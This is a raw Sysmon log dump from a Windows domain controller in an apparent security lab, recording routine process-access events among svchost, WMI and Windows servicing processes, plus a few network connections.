cb9 10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.010{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.994{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.994{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.994{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.994{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.d
ll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.972{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.545{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53583-false52.250.195.204-443https 354300x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.385{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61929- 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
